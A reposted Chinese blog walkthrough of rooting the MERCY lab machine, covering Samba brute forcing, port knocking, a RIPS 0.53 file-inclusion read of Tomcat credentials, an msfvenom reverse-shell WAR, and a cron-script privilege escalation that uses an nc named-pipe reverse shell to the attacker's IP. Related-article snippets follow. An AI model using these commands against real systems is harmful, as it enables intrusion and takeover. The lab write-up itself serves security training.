digitalworld.local: MERCY靶机入侵

最新推荐文章于 2025-05-25 14:29:55 发布
转载 最新推荐文章于 2025-05-25 14:29:55 发布 · 412 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/backlion/p/10368920.html

0x01 前言

MERCY是一个致力于PWK课程安全的靶机系统。MERCY是一款游戏名称,与易受攻击的靶机名称无关。本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息

靶机的下载地址:

https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download(注意确认下载镜像中MERCY.mf的sha256值是否正确)

 

0x02 信息收集

1.存活主机扫描
root@kali2018:~#arp-scan  -l

发现192.168.1.12就是目标靶机系统

2.端口扫描

通过NAMP对目标靶机进行端口扫描

root@kali2018:~# nmap  -A192.168.1.12

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST

Nmap scan report for 192.168.1.12

Host is up (0.00091s latency).

Not shown: 990 closed ports

PORT     STATESERVICE     VERSION

22/tcp   filtered ssh

53/tcp   opendomain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)

| dns-nsid:

|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu

80/tcp   filtered http

110/tcp  openpop3?

139/tcp  opennetbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

143/tcp  openimap        Dovecot imapd

|_ssl-date: TLS randomness does not represent time

445/tcp  opennetbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

993/tcp  openssl/imap    Dovecot imapd

|_imap-capabilities: CAPABILITY

| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server

| Not valid before: 2018-08-24T13:22:55

|_Not valid after:  2028-08-23T13:22:55

|_ssl-date: TLS randomness does not represent time

995/tcp  openssl/pop3s?

| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server

| Not valid before: 2018-08-24T13:22:55

|_Not valid after:  2028-08-23T13:22:55

|_ssl-date: TLS randomness does not represent time

8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1

| http-methods:

|_  Potentially risky methods: PUT DELETE

|_http-open-proxy: Proxy might be redirecting requests

|_http-server-header: Apache-Coyote/1.1

|_http-title: Apache Tomcat

MAC Address: 00:0C:29:91:A0:C6 (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

Host script results:

|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s

|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| smb-os-discovery:

|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)

|   Computer name: mercy

|   NetBIOS computer name: MERCY\x00

|   Domain name: \x00

|   FQDN: mercy

|_  System time: 2019-02-12T22:57:54+08:00

| smb-security-mode:

|   account_used: guest

|   authentication_level: user

|   challenge_response: supported

|_  message_signing: disabled (dangerous, but default)

| smb2-security-mode:

|   2.02:

|_    Message signing enabled but not required

| smb2-time:

|   date: 2019-02-12 09:57:54

|_  start_date: N/A

 

TRACEROUTE

HOP RTT     ADDRESS

1   0.91 ms 192.168.1.12

 

OS and Service detection performed. Please report any incorrec

发现目标端口445,8080等端口开放.其他如22,80被防火墙阻断.其中samba服务已开启(这是本文重点渗透目标)

0x03漏洞利用

无论在任何情况下,我们首先攻击的应用目标是Apache

Tomcat(http://192.168.1.12:8080/)

尝试访问tomcat后台管理页面,但需要输入正确的用户名和密码方可登陆。尝试输入各种已知的信息但还是无法进入。注意到其用户的配置信息在/etc/tomcat7/tomcat-users.xml中。

1.Samba漏洞攻击

 

通过smbclient命令列出目标靶机中可用的Samba服务共享名.

root@kali2018:~# smbclient -NL  192.168.1.12

可从上图中看到共享的几个名称,下面将挂载其共享目录到本地,但还是不允许访问目标共享,这里需身份认证。

root@kali2018:~# mkdir  /mnt/file

root@kali2018:~# mount  -tcifs  192.168.1.12:/qiu  /mnt/file

2.enum4linux枚举Samba账号
root@kali2018:~#  enum4linux -U -o 192.168.1.12

让我们将枚举出来的账号(qiu和pleadformercy)添加到mercy.txt中,并对其账号进行爆破。

3.samba账号爆破
root@kali2018:~#hydra -L mercy.txt -P/usr/share/wordlists/fasttrack.txt smb://192.168.1.12:139

可发现成功爆破出qiu的账号,密码为空

4.mount命令挂载目录
root@kali2018:~#mount -t cifs//192.168.1.12:/qiu/mnt/file -o username=qiu

列出挂载目录下的文件信息

5.private目录信息收集

发现.private目录提供了一些重要系统信息

root@kali2018:~# cd  /mnt/file/

root@kali2018:/mnt/file# cd  .private

root@kali2018:/mnt/file/.private# ls

opensesame  readme.txtsecrets

root@kali2018:/mnt/file/.private# cd opensesame/

root@kali2018:/mnt/file/.private/opensesame# ls

config  configprint
root@kali2018:/mnt/file/.private/opensesame# head -30 config

Here are settings for your perusal.

 

Port Knocking Daemon Configuration

 

[options]

       UseSyslog

 

[openHTTP]

       sequence    = 159,27391,4

       seq_timeout = 100

       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT

       tcpflags    = syn

 

[closeHTTP]

       sequence    = 4,27391,159

       seq_timeout = 100

       command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT

       tcpflags    = syn

 

[openSSH]

       sequence    = 17301,28504,9999

       seq_timeout = 100

       command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

       tcpflags    = syn

 

[closeSSH]

       sequence    = 9999,28504,17301

       seq_timeout = 100

       command     = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT

       tcpflags    = syn

上面显示了端口启动守护进程的防火墙端口开放的命令配置.

6.打开目标靶机防火墙端口

看到两组sequence,一组用于HTTP,另一组用于SSH。

(1)http的sequence脚本:

kncok.sh

#!/bin/bash

for PORT in 159 27391 4;do nmap -Pn 192.168.1.12  -p  $PORT;

done


(2)SSH的sequence脚本:

kncok1.sh

#!/bin/bash

for PORT in 17301 28504  9999;do nmap -Pn 192.168.1.12  -p $PORT;

done

3)通过sequence脚本来打开HTTP的端口

root@kali2018:~# ./knoch.sh

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST

Nmap scan report for 192.168.1.12

Host is up (0.00044s latency).

 

PORT    STATESERVICE

159/tcp closed nss-routing

MAC Address: 00:0C:29:91:A0:C6 (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST

Nmap scan report for 192.168.1.12

Host is up (0.00053s latency).

 

PORT      STATE  SERVICE

27391/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST

Nmap scan report for 192.168.1.12

Host is up (0.00042s latency).

 

PORT  STATESERVICE

4/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

(4)通过sequence脚本来打开SSH的端口

root@kali2018:~# ./knoch1.sh

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST

Nmap scan report for 192.168.1.12

Host is up (0.00049s latency).

 

PORT      STATESERVICE

17301/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST

Nmap scan report for 192.168.1.12

Host is up (0.00042s latency).

 

PORT      STATESERVICE

28504/tcp closed unknown

MAC Address: 00:0C:29:91:A0:C6 (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST

Nmap scan report for 192.168.1.12

Host is up (0.00031s latency).

 

PORT     STATESERVICE

9999/tcp closed abyss

MAC Address: 00:0C:29:91:A0:C6 (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

通过以上命令开放了80和22端口,现在在kali系统下打开80端口网站。

 

7.目录扫描

通过目录工具dirb对目标靶机系统80端口网站进行扫描,发现存在robots.txt文件

root@kali2018:~# dirb http://192.168.1.12

打开robots.txt的连接地址,发现一个有趣的目录/omercy

 

打开该目录网站,可发现RIPS 0.53版本存在

8.RIPS漏洞收集

根据EDB-ID 18660,RIPS 0.53易受本地文件包含(LFI)漏洞影响。(RIPS 0.53 LFI)

在  exploit-db 中搜索RIPS 0.53 漏洞。

https://www.exploit-db.com/exploits/18660

其PoC为:

http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

可以本地文件包含读出目标靶机的/etc/passwd的信息。

 

9.tomcat再次入侵

通过rips的lfi漏洞来本地包含tomcat-users.xml读取其配置信息。

http://192.168.1.12/nomercy/windows/code.php?file=./../../../../..//etc/tomcat7/tomcat-users.xml

此文件泄露了8080端口上运行的tomcat管理后台的用户名和密码信息

<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>

<? <user username="qiu" password="mercyplz" roles="manager-gui"/>

有了登录凭证,现在可以登录管理器的webapp来部署恶意webapp,这是一个允许反弹shell的WAR文件。

登陆到管理后台:

http://192.168.1.12:8080/manager/html

目标靶机系统为32位的ubuntu系统

我们可以通过msfvenom命令来生成这样的war包

root@kali2018:/opt#  msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.21  LPORT=3333  -f war -o shell.war

部署webapp后门文件shell.war

通过7z命令查看war包的内容,可以看到包含了yillzdtgvccxzwp.jsp文件

root@kali2018:/opt# 7z l shell.war

访问恶意Web应用程序,请在浏览器的地址栏中输入以下内容:

http://192.168.1.12:8080/shell/yillzdtgvccxzwp.jsp

在攻击机上执行nc监听反弹命令并使用python生成交互式的shell:python -c ‘import pty; pty.spawn(“/bin/sh”)’

root@kali2018:/opt# nc -lvvp 3333

以普通用户权限下查看其falg信息:

tomcat7@MERCY:/$ cat local.txt

cat local.txt

Plz have mercy on me! :-( :-(

tomcat7@MERCY:/$

0x04  权限提升

可以通过从tomcat-users.xml中搜索到登录帐户qiu。在信息收集的同时还发现了将权限提升为root的方法。有一个脚本/home/qiu/.private/secrets/timeclock将每隔三分钟,以root权限运行并写入到目录/var/www/html/time中。

tomcat7@MERCY:/$su qiu
qiu@MERCY:~/.private/secrets$ ls -al/home/qiu/.private/secrets/timeclock

ls -al  /home/qiu/.private/secrets/timeclock

-rwxrwxrwx 1 root root 222 Aug 31 00:47 /home/qiu/.private/secrets/timeclock

qiu@MERCY:~/.private/secrets$ cat timeclock

#!/bin/bash

now=$(date)

echo "The system time is: $now." > ../../../../../var/www/html/time

echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time

chown www-data:www-data ../../../../../var/www/html/time

将以下命令添加到脚本timclock中,其中NC监听的IP地址为攻击机(kali)的IP地址。

qiu@MERCY:~/.private/secrets$ echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21  5555 1>/tmp/p" >> timeclock

<mp/p | nc 192.168.1.21  5555 1>/tmp/p" >> timeclock

qiu@MERCY:~/.private/secrets$ cat timeclock

cat timeclock

#!/bin/bash

 

now=$(date)

echo "The system time is: $now." > ../../../../../var/www/html/time

echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time

chown www-data:www-data ../../../../../var/www/html/time

rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21  5555 1>/tmp/p

设置另一个nc监听,监听端口为5555,3分钟后将反弹到目标root  shell.并在攻击机上执行nc监听反弹命令并使用python生成交互式的shell:python -c ‘import pty; pty.spawn(“/bin/sh”)’

root@kali2018:/mnt/file/.private/opensesame# nc -lvvp  5555

listening on [any] 5555 ...

192.168.1.12: inverse host lookup failed: Unknown host

connect to [192.168.1.21] from (UNKNOWN) [192.168.1.12] 39346

python -c "import pty;pty.spawn('/bin/bash')"

0x05 flag信息查看

进入到root目录然后查看proof.txt得到flag信息

r

oot@MERCY:~# cd /root

cd /root

root@MERCY:~# ls

ls

author-secret.txt  configproof.txt

root@MERCY:~# cat  proof.txt

cat  proof.txt

Congratulations on rooting MERCY. :-)

root@MERCY:~#

 

 

 
 
 
 

转载于:https://www.cnblogs.com/backlion/p/10368920.html

4、密码分析:Serpent与Mercy加密算法的挑战
z5a6b的博客
06-22 16
本文深入探讨了Serpent与Mercy加密算法在密码分析领域面临的挑战。针对Serpent算法,介绍了其线性密码分析的最新进展,包括对10轮和11轮Serpent的攻击复杂度及流程。对于Mercy分组密码,详细解析了其结构特点,并通过差分攻击方法揭示了其设计上的弱点。文章还总结了攻击成功的原因,并提出了增强Mercy算法安全性的改进建议。这些研究为评估和提升加密算法的安全性提供了重要参考。
Vulhub —— MERCY-v2 实战
战神/calmness的博客
12-24 1738
目录 目标 环境 过程 信息收集 nmap扫描 访问8080端口页面 目录遍历 dirb gobuster manager页面 扫描nikto 枚举 用户enum4linux 版本信息 搜索tomcat 漏洞 访问共享 搜索漏洞rips 0.53 文件包含 配置信息tomcat7/tomcat-users.xml 获得用户名和密码 文件上传 获取shell 信息扫描 LinEnum.sh扫描到的用户: linux-exploit-suggester.sh 收集
Vulnhub:Digitalworld.local (Mercy v2)靶机
qq_43884092的博客
04-10 676
使用enum4linux对目标smb服务进行枚举,8080端口的网站robots.txt提示存在一个文件访问该文件得到一串base64加密的密文,之后对密文进行解密,解密密文提示存在一个密码:password,使用用户qiu和密码:password,查看目标文件共享,在\\.private\opensesame目录下存放有两个文件,查看configprint发现是一个脚本,其中把/etc/knockd.conf配置文件追加到config文件中,使用knock进行端口碰撞开启22和80端口
靶机渗透练习55-digitalworld.localMERCY v2
hirak0的博客
04-19 9074
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ Description MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. 😃 MERCY is a name-play
Mercy v2靶机通关笔记
weixin_43433141的博客
05-25 326
靶机ip为192.168.55.155。
Vulnhub Mercy靶场 Walkthrough
RichardLuo
04-09 241
Vulnhub Mercy靶场 Walkthrough
Vulnhub靶机 Digitalworld.local (Mercy v2)
菜浪马废的博客
05-04 534
i在这里插入图片描述 敲门呗 还可以内核提权
OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
weixin_47311099的博客
11-15 1225
OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 & smb & 端口敲门 & RIPS & tomcat & linux 提权)
冬萍子癸水
04-25 1320
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap PORT STATE SERVICE REASON VERSION 22/tcp filtered ssh port-unreach...
请对英文提示给于中文解释。并说明uwsgi启动是否已成功没有问题。 uwsgi --ini frobshop_uwsgi.ini [uWSGI] getting INI configuration from frobshop_uwsgi.ini *** Starting uWSGI 2.0.30 (64bit) on [Sat Jun 28 16:17:34 2025] *** compiled with version: 9.3.0 on 26 June 2025 16:32:37 os: Linux-4.4.194.pdnas.rk3328.258 #1 SMP Sat Sep 18 10:50:43 CST 2021 nodename: arm-64 machine: aarch64 clock source: unix pcre jit disabled detected number of CPU cores: 4 current working directory: /root/.virtualenvs/frobshop detected binary path: /root/.virtualenvs/venvoscar/bin/uwsgi setgid() to 1000 set additional group 0 (root) setuid() to 1000 chdir() to /root/.virtualenvs/frobshop your processes number limit is 15677 your memory page size is 4096 bytes detected max file descriptor number: 1024 lock engine: pthread robust mutexes thunder lock: disabled (you can enable it with --thunder-lock) uwsgi socket 0 bound to TCP address 192.168.1.26:8000 fd 3 Python version: 3.8.10 (default, Mar 18 2025, 20:04:55) [GCC 9.4.0] Python main interpreter initialized at 0x55b0577230 python threads support enabled your server socket listen backlog is limited to 100 connections your mercy for graceful operations on workers is 60 seconds mapped 364600 bytes (356 KB) for 4 cores *** Operational MODE: preforking *** WSGI app 0 (mountpoint='') ready in 10 seconds on interpreter 0x55b0577230 pid: 1201113 (default app) *** uWSGI is running in multiple interpreter mode *** spawned uWSGI master process (pid: 1201113) spawned uWSGI worker 1 (pid: 1201121, cores: 1) spawned uWSGI worker 2 (pid: 1201122, cores: 1) spawned uWSGI worker 3 (pid: 1201123, cores: 1) spawned uWSGI worker 4 (pid: 1201124, cores: 1)
最新发布
06-29
常见日志信息解释:- ***Starting uWSGI...:开始启动- ***Options: ...:显示配置选项-*** uWSGIis runningin multipleinterpreter mode...:多解释器模式-*** OperationalMODE:...:运行模式(如preforking,...
多python环境中devstack-keystone.service无法启动的一次排查
albertjone的博客
07-07 2223
多python环境中devstack-keystone.service无法启动的一次排查 前言 问题描述 问题排查 问题解决 番外 问题描述 devstack部署的流程直接挂了,查看终端上的问题是keystone没有起来 通过查看keystone服务的日志 journalctl -u devstack@keystone.service Jul 07 01:25:05 cicd1 devstack@keystone.service[27280]: uwsgi socket 0 bound to UNIX
DIGITALWORLD.LOCAL-BRAVERY靶场
qq_20032803的博客
02-04 843
1.发现主机/扫描 root@kali:~# nmap -sn 192.168.100.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 10:26 EST Nmap scan report for 192.168.100.1 Host is up (0.00051s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.100.2 Ho
20-VulnHub-Brainpan2
尼德霍格007
08-30 1896
20-VulnHub-Brainpan2 靶机地址: 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2020-7-16 一、信息收集 扫描目标主机 nmap -sP 192.168.21.0/24 扫描开放端口 nmap -A -p- 192.168.21.142 可以看到开放了9999和10000两个端口,前一个是abyss服务,后一个是http服务 先看一下熟悉的http服务 整个页面就一张图片,源码也没有有用信息 看一下9999端口,使用nc连接 nc 1
Linux无法通过ssh连接,linux – 为什么ssh连接无法连接整个正确的设置?
weixin_33901449的博客
05-12 454
使用Ubuntu Server 14.04我在端口2222上运行了ssh服务器(他们在构建时就这样问了).我已经对整个设置进行了审核,似乎没有任何问题.这是设置的:>在构建时,它们将端口2222上的tcp连接重定向到我的IP.>同样适用于端口80,我可以达到.>当我尝试通过端口2222上的SSH连接时,我可以使用iftop查看传入的网络活动.>我得到了适当的规则:2222 ...
vulnhub:twilight靶机
qq_43884092的博客
01-11 274
上传php-reverse-shell1.jpg,通过burp抓包修改文件后缀为php。访问php-reverse-shell.php获得shell。上传的文件被上传到此处/gallery/original/发现/etc/passwd有写权限,写入一个用户。靶机:192.168.111.148。之后su切换用户,获得flag。
CTF SMB信息泄漏
Kstheme的博客
08-18 3238
工具 靶机 kali linux 操作步骤 SMB介绍 SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Inter)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为Samba。 SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445 SMB协议,计算机可以访问网络资源,下载对...
HackTheBox::Jerry
aya3t的博客
10-12 341
HackTheBox::Jerry
Metasploit爆破Tomcat弱口令
→_→
08-17 1458
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用 Tomcat弱口令漏洞,破解出登陆密码,获得目标主机会话。 [实验原理] 1) 利用枚举的方法破解Tomcat的弱口令。 [实验环境] [实验步骤] 一、利用nmap工具扫描目标主机 1.1 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/C...
分布式存储-Minio环境搭建
温暖不了你的心的博客
07-14 4710
MinIO是一个基于Apache License V2.0开源协议的轻量级的对象存储服务。 适合存储大容量非结构化的数据,如图片、视频、日志文件、备份数据和容器/虚拟机镜像等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值